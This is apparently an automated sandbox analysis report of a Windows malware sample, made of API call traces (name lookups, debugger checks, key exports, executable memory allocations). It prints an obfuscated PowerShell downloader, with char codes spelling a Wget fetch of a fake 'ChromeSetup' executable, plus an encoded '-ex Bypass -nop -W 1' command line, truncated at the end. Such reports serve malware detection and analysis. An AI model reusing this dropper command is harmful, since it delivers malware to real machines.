Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:35
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + [nEt.seRviCepOinTmanAGeR]:: <<<< SeCUrItYProtOcOl
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: = [Net.secURitypROTOCoLTYpe]::Tls12
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: ; WgeT ([char]
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: + [CHar]
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: + [cHar]
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: + [char]
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: + [chAR
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: + [Char
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: + [CHAr
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: + [cHaR
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: + [cHAr
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: + [CHAR
console_handle: 0x000001bb
1 1 0

WriteConsoleW

buffer: + [cHAr
console_handle: 0x000001df
1 1 0

WriteConsoleW

buffer: + [chAR
console_handle: 0x00000203
1 1 0

WriteConsoleW

buffer: + [cHaR
console_handle: 0x00000227
1 1 0

WriteConsoleW

buffer: + [CHAR
console_handle: 0x0000024b
1 1 0

WriteConsoleW

buffer: + [Char
console_handle: 0x0000026f
1 1 0

WriteConsoleW

buffer: + [char
console_handle: 0x00000293
1 1 0

WriteConsoleW

buffer: + [cHaR
console_handle: 0x000002b7
1 1 0

WriteConsoleW

buffer: + [ChAR
console_handle: 0x000002db
1 1 0

WriteConsoleW

buffer: + [chaR
console_handle: 0x000002ff
1 1 0

WriteConsoleW

buffer: + [cHar
console_handle: 0x00000323
1 1 0

WriteConsoleW

buffer: + [chAr
console_handle: 0x00000347
1 1 0

WriteConsoleW

buffer: + [CHar
console_handle: 0x0000036b
1 1 0

WriteConsoleW

buffer: + [ChA
console_handle: 0x0000038f
1 1 0

WriteConsoleW

buffer: r] 101
console_handle: 0x0000039b
1 1 0

WriteConsoleW

buffer: + [cH
console_handle: 0x000003b3
1 1 0

WriteConsoleW

buffer: aR] 115
console_handle: 0x000003bf
1 1 0

WriteConsoleW

buffer: + [c
console_handle: 0x000003d7
1 1 0

WriteConsoleW

buffer: hAR] 116
console_handle: 0x000003e3
1 1 0

WriteConsoleW

buffer: CHAr] 47
console_handle: 0x00000407
1 1 0

WriteConsoleW

buffer: CHar] 67
console_handle: 0x0000042b
1 1 0

WriteConsoleW

buffer: chAR] 104
console_handle: 0x0000044f
1 1 0

WriteConsoleW

buffer: [char] 114
console_handle: 0x00000473
1 1 0

WriteConsoleW

buffer: [ChaR] 111
console_handle: 0x00000497
1 1 0

WriteConsoleW

buffer: [CHaR] 109
console_handle: 0x000004bb
1 1 0

WriteConsoleW

buffer: [cHAr] 101
console_handle: 0x000004df
1 1 0

WriteConsoleW

buffer: [cHar] 83
console_handle: 0x00000503
1 1 0

WriteConsoleW

buffer: [ChAr] 101
console_handle: 0x00000527
1 1 0

WriteConsoleW

buffer: [CHAR] 116
console_handle: 0x0000054b
1 1 0

WriteConsoleW

buffer: [cHAR] 117
console_handle: 0x0000056f
1 1 0

WriteConsoleW

buffer: [cHAR] 112
console_handle: 0x00000593
1 1 0

WriteConsoleW

buffer: [CHaR] 46
console_handle: 0x000005b7
1 1 0

WriteConsoleW

buffer: [chAR] 101
console_handle: 0x000005db
1 1 0

WriteConsoleW

buffer: [chAR] 120
console_handle: 0x000005ff
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ff6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffc28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffc28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffc28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffe28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffe28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffe28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffe28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffe28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffe28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ff668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ff668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ff668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffc28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffc28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffc28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ff268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffc28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffc28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffc28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffc28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffc28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffc28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffc28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004fffa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004fffa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004fffa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004fffa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004fffa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004fffa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004fffa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004fffa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004fffa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004fffa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004fffa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004fffa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004fffa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004fffa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffee8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ffee8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006a20e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006a27e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006a27e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006a27e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006a2aa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006a2aa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006a2aa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006a2aa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006a2aa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006a2aa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 1245184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02840000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02930000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02931000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02932000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0271a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02727000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02712000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02725000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0271c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02920000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02713000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02714000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02715000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02716000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02717000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02718000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02719000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bf0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bf1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bf2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bf3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bf4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bf5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bf6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bf7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bf8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bf9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bfa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bfb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bfc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bfd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bfe000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c03000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c04000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BypAsS -nop -W 1 -ec IAAJAAkAIAAJAAkAIABbAG4ARQB0AC4AcwBlAFIAdgBpAEMAZQBwAE8AaQBuAFQAbQBhAG4AQQBHAGUAUgBdADoAOgBTAGUAQwBVAHIASQB0AFkAUAByAG8AdABPAGMATwBsACAACQAJAAkACQAJAAkACQAJAAkACQAJAD0AIAAgACAAIAAgACAAIAAgAFsATgBlAHQALgBzAGUAYwBVAFIAaQB0AHkAcABSAE8AVABPAEMAbwBMAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAJACAACQAgAAkACQAJAAkAIAAgAAkAIAAJAAkAIABXAGcAZQBUACAAIAAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAOAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkAC